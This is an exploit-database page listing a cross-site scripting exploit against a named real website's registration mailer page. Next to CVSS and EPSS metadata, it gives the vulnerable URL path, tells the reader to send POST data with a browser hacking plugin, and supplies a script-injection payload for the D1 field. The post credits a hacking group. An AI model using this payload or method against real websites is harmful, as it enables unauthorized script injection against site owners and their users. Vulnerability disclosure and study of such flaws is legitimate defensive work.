Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
Not specified | CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2017-01-20 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:P/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N | 0.02192 | 0.50148 |
Ashiyane Training Center Site Scripting |=============================================================| |[+] Exploit Title: Ashiyane Training Center Site Scripting |[+] |[+] Exploit Author: Hacker.khan |[+] |[+] Vendor Homepage: http://train.ashiyane.ir |[+] |[+] Tested on: Win7 |[+] |[+] Date: 2017-01-17 |=============================================================| |[+] The use of this vulnerability through which an attacker Hackbr plugin using scripts can be run on your site |[+] Vulnerability Path : http://train.ashiyane.ir/register/mail.php |[+] Put the code in the plug-hacking on the box |[+] Enable post data |[+] D1="><script>alert(/xss/)</script> |[+] ID: [email protected] ================================================================= |[+] Thanks to : Iranian Anonymous |[+] Exploit Author: Hacker.khan
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.